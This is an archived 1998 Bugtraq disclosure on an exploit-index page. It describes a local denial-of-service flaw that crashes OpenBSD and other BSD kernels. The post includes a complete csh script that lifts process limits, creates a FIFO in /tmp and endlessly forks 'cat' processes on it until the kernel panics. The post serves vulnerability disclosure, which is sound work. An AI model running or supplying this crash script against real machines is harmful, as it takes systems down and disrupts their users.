OpenBSD mkfifo DOS attack
| Description: | You can run the *BSD kernel out of non-pageable memory by making a fifo (via mkfifo) and forking a bunch of processes trying to cat it. |
| Author: | Jason Downs <downsj@DOWNSJ.COM> |
| Compromise: | Crash the system (stupid DOS attack) |
| Vulnerable Systems: | OpenBSD, presumably NetBSD, FreeBSD, BSDI |
| Date: | 25 January 1998 |
Date: Sun, 25 Jan 1998 15:54:25 -0800
From: Jason Downs <downsj@DOWNSJ.COM>
To: BUGTRAQ@NETSPACE.ORG
Subject: Simple OpenBSD crash script
Here is a rather simple method of crashing most OpenBSD systems (and, I
assume, NetBSD or anything else running 4.4BSD vm without this problem fixed).
Most, if not all, kernels have process limits high enough for a normal
user to run the kernel out of non-pageable map entries. The easiest way
that I have found to do this is with the enclosed script.
If the per-user process/descriptor limits are high enough, running this script
will result in a kernel panic.
#!/bin/csh
set path = ( /usr/bin /usr/sbin /bin /sbin )
unlimit
cd /tmp
if ( -e fifo ) then
rm fifo
endif
mkfifo fifo
while ( 1 )
cat fifo >& /dev/null &
end
--
Jason Downs
downsj@downsj.com
The master index of all exploits is available
here (Very large file)
Or you can pick your favorite operating system:
This page is part of Fyodor's exploit
world.
For a free program to automate scanning your network for vulnerable
hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources:
